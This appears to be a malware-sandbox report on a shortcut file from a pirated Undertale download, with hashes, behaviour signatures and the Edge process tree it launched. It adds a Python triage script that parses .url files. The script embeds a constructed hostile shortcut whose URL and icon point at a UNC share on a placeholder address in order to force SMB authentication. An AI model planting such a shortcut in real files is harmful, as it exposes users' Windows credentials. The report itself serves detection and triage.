Analysis

max time kernel: 145s
max time network: 152s
platform: windows10-2004_x64
resource: win10v2004-20240611-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240611-en, locale:en-us, os:windows10-2004-x64, system
submitted: 01-07-2024 04:32

Static task: static1
Behavioral task: behavioral1
  Sample: Undertale_v1.08c/Undertale_v1.08c_setup.exe
  Resource: win7-20231129-en
Behavioral task: behavioral2
  Sample: Undertale_v1.08c/Undertale_v1.08c_setup.exe
  Resource: win10v2004-20240508-en
Behavioral task: behavioral3
  Sample: Undertale_v1.08c/tuttop.com.url
  Resource: win7-20240221-en
Behavioral task: behavioral4
  Sample: Undertale_v1.08c/tuttop.com.url
  Resource: win10v2004-20240611-en
General

Target: Undertale_v1.08c/tuttop.com.url
Size: 109B
MD5: 994ceda3baeeafa875c17598f97387a6
SHA1: 0c5d2297bdf8f712f5fbbf495e1f9add9d76d8ee
SHA256: b577a2d69bc2e609b6aa32aaf6e78a0aae3aeba2517d23edabe14387cd478c18
SHA512: 7a8fdd683c546daa52a2275c2a461880d519d898ed08c86eac35360d6007b211aaf478ac6409d5340fe7ec67adca07a0d9dc20b2245c9c80293ada6f15251c46
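The target is a 109-byte Internet Shortcut (.url) file shipped inside the Undertale_v1.08c download next to the installer. The report records only its name, size and hashes, not its bytes, so the triage step below is an added example (not sandbox output and not code from the page): it parses the [InternetShortcut] INI section, extracts the host the shortcut opens, and flags the fields that make a .url file more than a bookmark: a non-web URL scheme (file:, UNC) or an IconFile/WorkingDirectory pointing at a UNC path, which makes Explorer authenticate to the remote host as soon as the file is rendered in a folder view. Both byte strings are constructed for the example; the "reported" one is an assumed reconstruction consistent with the URL the sandbox saw Edge open, the "hostile" one is a contrast case with an assumed TEST-NET address.

```python
import configparser
import re
from typing import List, Optional
from urllib.parse import urlparse

# Constructed sample: the report gives only the file name (tuttop.com.url), its size
# and hashes, and shows that opening it launched https://tuttop.com/. These bytes are
# an assumed reconstruction for the example, not the sample's actual content.
SAMPLE_REPORTED = b"[InternetShortcut]\r\nURL=https://tuttop.com/\r\nIconIndex=1\r\n"

# Constructed contrast case (assumed TEST-NET host): the shortcut fields a triage
# step must flag, because Explorer resolves UNC icon/target paths over SMB.
SAMPLE_HOSTILE = (
    b"[InternetShortcut]\r\n"
    b"URL=file://\\\\203.0.113.5\\share\\setup.exe\r\n"
    b"IconFile=\\\\203.0.113.5\\share\\icon.ico\r\n"
    b"IconIndex=0\r\n"
)

UNC_RE = re.compile(r"\\\\[^\\/\s]+\\")   # matches \\host\ at any position
WEB_SCHEMES = {"http", "https"}


def parse_url_file(data: bytes) -> dict:
    """Parse an Internet Shortcut (.url) file; return its [InternetShortcut] keys."""
    text = data.decode("utf-8-sig", errors="replace")   # tolerate BOM and ANSI bytes
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str        # keep key case: URL, IconFile, WorkingDirectory
    cp.read_string(text)
    if not cp.has_section("InternetShortcut"):
        raise ValueError("no [InternetShortcut] section: not a .url file")
    return dict(cp.items("InternetShortcut"))


def target_host(fields: dict) -> Optional[str]:
    """Hostname the shortcut opens, for blocklist or reputation lookups."""
    return urlparse(fields.get("URL", "")).hostname


def triage(fields: dict) -> List[str]:
    """Return findings for a parsed .url file; an empty list is a plain web shortcut."""
    findings = []
    url = fields.get("URL", "")
    scheme = urlparse(url).scheme.lower()
    if scheme not in WEB_SCHEMES:
        findings.append(f"URL scheme {scheme or '(none)'!r} is not http/https: {url}")
    for key in ("URL", "IconFile", "WorkingDirectory"):
        value = fields.get(key, "")
        if UNC_RE.search(value):
            findings.append(f"{key} references a UNC path (forced SMB authentication): {value}")
    return findings


if __name__ == "__main__":
    for name, blob in (("reported", SAMPLE_REPORTED), ("hostile", SAMPLE_HOSTILE)):
        fields = parse_url_file(blob)
        print(name, target_host(fields), triage(fields) or "no findings")
```

Run it against every .url extracted from an archive before anyone double-clicks one; a shortcut with no findings still deserves the hostname check, since a plain https URL is exactly what this sample carries.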
Malware Config
Signatures
-
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes: msedge.exe
  description       | ioc                                                                   | process
  Key opened        | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                    | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName  | msedge.exe

- Suspicious behavior: EnumeratesProcesses (10 IoCs)
  Processes: msedge.exe, identity_helper.exe
  pid  | process
  1512 | msedge.exe (x2)
  1208 | msedge.exe (x2)
  4692 | identity_helper.exe (x2)
  4492 | msedge.exe (x4)

- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (6 IoCs)
  Processes: msedge.exe
  pid  | process
  1208 | msedge.exe (x6)

- Suspicious use of FindShellTrayWindow (25 IoCs)
  Processes: msedge.exe
  pid  | process
  1208 | msedge.exe (x25)

- Suspicious use of SendNotifyMessage (24 IoCs)
  Processes: msedge.exe
  pid  | process
  1208 | msedge.exe (x24)

- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes: rundll32.exe, msedge.exe
  description     | pid  | process      | target pid | target process
  wrote to memory | 1724 | rundll32.exe | 1208       | msedge.exe (x2)
  wrote to memory | 1208 | msedge.exe   | 4488       | msedge.exe (x2)
  wrote to memory | 1208 | msedge.exe   | 4808       | msedge.exe (repeated)
  wrote to memory | 1208 | msedge.exe   | 1512       | msedge.exe (x2)
  wrote to memory | 1208 | msedge.exe   | 4636       | msedge.exe (repeated)
  (64 entries in total; the 4808 and 4636 rows account for the remainder)
Processes
(children are indented under their parent process)

C:\Windows\System32\rundll32.exe
  "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Undertale_v1.08c\tuttop.com.url
  signatures: Suspicious use of WriteProcessMemory

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://tuttop.com/
    signatures: Enumerates system info in registry; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage; Suspicious use of WriteProcessMemory

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9ac5746f8,0x7ff9ac574708,0x7ff9ac574718

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,9534271064072310159,548916856063895213,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,9534271064072310159,548916856063895213,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:3
      signatures: Suspicious behavior: EnumeratesProcesses

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,9534271064072310159,548916856063895213,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:8

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9534271064072310159,548916856063895213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9534271064072310159,548916856063895213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2144,9534271064072310159,548916856063895213,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4952 /prefetch:8

    C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,9534271064072310159,548916856063895213,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5056 /prefetch:8

    C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,9534271064072310159,548916856063895213,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5056 /prefetch:8
      signatures: Suspicious behavior: EnumeratesProcesses

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9534271064072310159,548916856063895213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9534271064072310159,548916856063895213,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9534271064072310159,548916856063895213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4028 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9534271064072310159,548916856063895213,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4000 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,9534271064072310159,548916856063895213,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1716 /prefetch:2
      signatures: Suspicious behavior: EnumeratesProcesses

C:\Windows\System32\CompPkgSrv.exe
  C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe
  C:\Windows\System32\CompPkgSrv.exe -Embedding
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads

- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
  Filesize: 152B
  MD5: 477462b6ad8eaaf8d38f5e3a4daf17b0
  SHA1: 86174e670c44767c08a39cc2a53c09c318326201
  SHA256: e6bbd4933b9baa1df4bb633319174de07db176ec215e71c8568d27c5c577184d
  SHA512: a0acc2ef7fd0fcf413572eeb94d1e38aa6a682195cc03d6eaaaa0bc9e5f4b2c0033da0b835f4617aebc52069d0a10b52fc31ed53c2fe7943a480b55b7481dd4e

- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
  Filesize: 152B
  MD5: b704c9ca0493bd4548ac9c69dc4a4f27
  SHA1: a3e5e54e630dabe55ca18a798d9f5681e0620ba7
  SHA256: 2ebd5229b9dc642afba36a27c7ac12d90196b1c50985c37e94f4c17474e15411
  SHA512: 69c8116fb542b344a8c55e2658078bd3e0d3564b1e4c889b072dbc99d2b070dacbc4394dedbc22a4968a8cf9448e71f69ec71ded018c1bacc0e195b3b3072d32

- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
  Filesize: 168B
  MD5: f919a6cb218e1329629812e9efa231f6
  SHA1: 62e30562f316d6a40b5b348dcca04333fafcd820
  SHA256: 17b7680fa1e39b2960770fa04c8c2e96c327b85b902b4ecde9ef55832bc89fbe
  SHA512: 99b97f068417d7c5474b563917a1f11319c5975970546ea9b0e1c70b092bcf9fbb5acb9b63431a52076b519b840d20be6b1610c728cc720c8d9ef8f8229a1243

- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
  Filesize: 573B
  MD5: dc3cb08d7516ca133a73103248795730
  SHA1: a4957ed9aa3117b4872a4720ebc27fa9278a4f5f
  SHA256: 9064722e444d24407a9cd2622ebb7aefe434a962224023f1bc5c4e1df0a6a19b
  SHA512: 17e16a508b3df70c5bcd3d405f61b3949ef970ae14e8299956639174fb1a06946018349d21d12d047263696b9590ad15cc7742834a95ac6acb3ba6daaf159bb6

- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
  Filesize: 6KB
  MD5: 3e9502657b4a6310038c3985bd6493f8
  SHA1: 045ed8f2dddc97456dbaea1e081413a4faaa37f9
  SHA256: ca2824b0eba2f1c3c24f65bdb701bab6d342dda069864f0096edef260f2989b1
  SHA512: cd08aa73a2a1642d3d871006bba07e6ff7696d86e4c363e066ddf066867e3f88f09fe10d23935dbd6725837c6cf847564277243b9ca50e13cbffbbb564b29b07

- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
  Filesize: 5KB
  MD5: 0a15b1bdd691a41d7eab5229326c68d8
  SHA1: 8259ccf3130b70d59935811c21457550d02ae19e
  SHA256: 48399b61f4e240ddecd5076f20717badb10876ee1f2994f1c30cadc89a97331a
  SHA512: a6cbcf15afdd19bea27f75b89dee9498023fbb18f9bab244780a7e6f6d74e5fb8c88893c4bc95f56f933061d516ad90d4b3d6847de1f98639ad79afd67737d0f

- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
  Filesize: 16B
  MD5: 6752a1d65b201c13b62ea44016eb221f
  SHA1: 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
  SHA256: 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
  SHA512: 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
  Filesize: 11KB
  MD5: 861bcbeae6e3ab97ccd1431c608b4c51
  SHA1: fcf91b0a16f248d4ade55df40e6fd26b2a35e48c
  SHA256: 33afbc23b4b95e8a4babbf10ad1845bb2a1a790793c3046ca89b86a6d3831488
  SHA512: 9ecce5179feb17d74316abf79fa325f8373d9c68798417d2337b8397881480d456d19007d1ccf1d14971807ba39c907589458b010ae82f69d46a5a32a2f885b4

- \??\pipe\LOCAL\crashpad_1208_CKXEIWNXOQVVYTHY
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
  (these are the digests of zero-length input: the named pipe yielded no content, so the hashes carry no information about it)

All of the files above are Edge's own profile and crash-handler state written during the browser launch; none of them is a download from tuttop.com.